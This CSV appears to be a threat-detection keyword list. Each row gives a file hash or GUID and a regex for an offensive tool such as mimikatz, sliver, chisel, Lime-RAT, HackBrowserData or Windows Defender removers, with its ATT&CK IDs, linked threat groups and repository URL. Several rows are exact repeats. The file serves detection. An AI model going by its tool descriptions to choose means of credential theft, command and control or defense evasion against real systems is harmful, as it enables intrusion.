"*388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00*",".{0,1000}388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","24757"
"*388f88340ab9e87c70b35cd3c2ea54993328d291c8606017507fa9fe3c768392*",".{0,1000}388f88340ab9e87c70b35cd3c2ea54993328d291c8606017507fa9fe3c768392.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24759"
"*389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369*",".{0,1000}389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24760"
"*3890a3df1d59c7b9accc11721287353ba992630fccf9ffc9361cb7184af8fbda*",".{0,1000}3890a3df1d59c7b9accc11721287353ba992630fccf9ffc9361cb7184af8fbda.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24761"
"*3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef*",".{0,1000}3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24762"
"*3891b5f4e423fe98717c69231f6f5ba1db16b1997858f3ecdf1e395bb9640a84*",".{0,1000}3891b5f4e423fe98717c69231f6f5ba1db16b1997858f3ecdf1e395bb9640a84.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24763"
"*3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e*",".{0,1000}3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24766"
"*38a0bf28c523180015d3c969129a72e94bbbcdb4dc30f9a630b32f6c97c41e0d*",".{0,1000}38a0bf28c523180015d3c969129a72e94bbbcdb4dc30f9a630b32f6c97c41e0d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","24767"
"*38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f*",".{0,1000}38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24769"
"*38AF011B-95F8-4F42-B4B9-B1AEE328A583*",".{0,1000}38AF011B\-95F8\-4F42\-B4B9\-B1AEE328A583.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#GUIDproject","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","24772"
"*38b56d8415cbf78361f7748a637162c03d430f698862f6a3d4a1d7b450971053*",".{0,1000}38b56d8415cbf78361f7748a637162c03d430f698862f6a3d4a1d7b450971053.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24774"
"*38bbfb8a6e3de5fb329505605290d408b8d99be65f351daf4b015773525a20e3*",".{0,1000}38bbfb8a6e3de5fb329505605290d408b8d99be65f351daf4b015773525a20e3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24776"
"*38bd23d1d1f4ebf370687153ac82cf815d811d46f28bdf2259a8c59e9f3553f1*",".{0,1000}38bd23d1d1f4ebf370687153ac82cf815d811d46f28bdf2259a8c59e9f3553f1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24777"
"*38beeacf86dd8936b862c650818a65a0386a4cbd927c8191e84f9b8c8322a09d*",".{0,1000}38beeacf86dd8936b862c650818a65a0386a4cbd927c8191e84f9b8c8322a09d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24778"
"*38d05edbbe5d0667278b55dbf9c53493153e8416e4694c97d92f06f429690dc0*",".{0,1000}38d05edbbe5d0667278b55dbf9c53493153e8416e4694c97d92f06f429690dc0.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24783"
"*38d181fa41f6cf0a8125620801d745db9f0d479e2ecc130cd136e9190b9de52d*",".{0,1000}38d181fa41f6cf0a8125620801d745db9f0d479e2ecc130cd136e9190b9de52d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24784"
"*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*",".{0,1000}38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","24786"
"*38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a*",".{0,1000}38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","24787"
"*3900ecdf76a186de3454e3f2dd45b338cc46cd855e2a027160f3cf6a25385482*",".{0,1000}3900ecdf76a186de3454e3f2dd45b338cc46cd855e2a027160f3cf6a25385482.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","24788"
"*3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9*",".{0,1000}3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24790"
"*390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf*",".{0,1000}390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24791"
"*3911d52883ec32df91fde022f08e4acf0ee9d4d52990b36cb603da6bde167f32*",".{0,1000}3911d52883ec32df91fde022f08e4acf0ee9d4d52990b36cb603da6bde167f32.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24793"
"*391d4825efd725d2deed4dd7d2addc62f38c3c8f15e84ada070aabc2303b4ab4*",".{0,1000}391d4825efd725d2deed4dd7d2addc62f38c3c8f15e84ada070aabc2303b4ab4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24795"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24797"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24798"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24799"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24800"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24801"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24802"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24803"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24804"
"*39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6*",".{0,1000}39210402176e6bf813dbff36370978a66505dc7a25008841e5225603ccbcb8e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24805"
"*3922246663d030813506516c147f8281d8c81f1cdc1153238643f580b52093d7*",".{0,1000}3922246663d030813506516c147f8281d8c81f1cdc1153238643f580b52093d7.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#filehash","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","24806"
"*3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3*",".{0,1000}3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz compiled hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file/3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3/details","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24807"
"*3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43*",".{0,1000}3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24808"
"*393bbcf5be1871ceb753e35e87e904349d6a55fef87d0f1ace01b859967365dc*",".{0,1000}393bbcf5be1871ceb753e35e87e904349d6a55fef87d0f1ace01b859967365dc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24809"
"*394829a9b5326aecbe637fbbac5da01ea7f74355a512dda4f865a58869cf16e0*",".{0,1000}394829a9b5326aecbe637fbbac5da01ea7f74355a512dda4f865a58869cf16e0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24812"
"*394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798*",".{0,1000}394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24814"
"*394d1e6fe47e5958c6cd1ea8a053b100d231c72cabd11f044f51007ef60f2ed4*",".{0,1000}394d1e6fe47e5958c6cd1ea8a053b100d231c72cabd11f044f51007ef60f2ed4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24815"
"*3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901*",".{0,1000}3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24817"
"*39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d*",".{0,1000}39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24818"
"*395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4*",".{0,1000}395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24819"
"*39556e3779ee1fc2a06c32eff48acd03a01aa0b59bac075ad1457b65a14b3911*",".{0,1000}39556e3779ee1fc2a06c32eff48acd03a01aa0b59bac075ad1457b65a14b3911.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","24820"
"*3955964e71c4cb56d759d128097b15278c07c9ba0fb280958fe42a36ea84baad*",".{0,1000}3955964e71c4cb56d759d128097b15278c07c9ba0fb280958fe42a36ea84baad.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24821"
"*395cb1f243d7c705459a5c7c931b48617a39ca9e89b04f4c9759f25364cfe371*",".{0,1000}395cb1f243d7c705459a5c7c931b48617a39ca9e89b04f4c9759f25364cfe371.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24823"
